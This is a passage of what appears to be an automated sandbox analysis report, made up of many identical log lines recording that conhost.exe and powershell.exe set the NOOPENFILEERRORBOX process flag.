                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
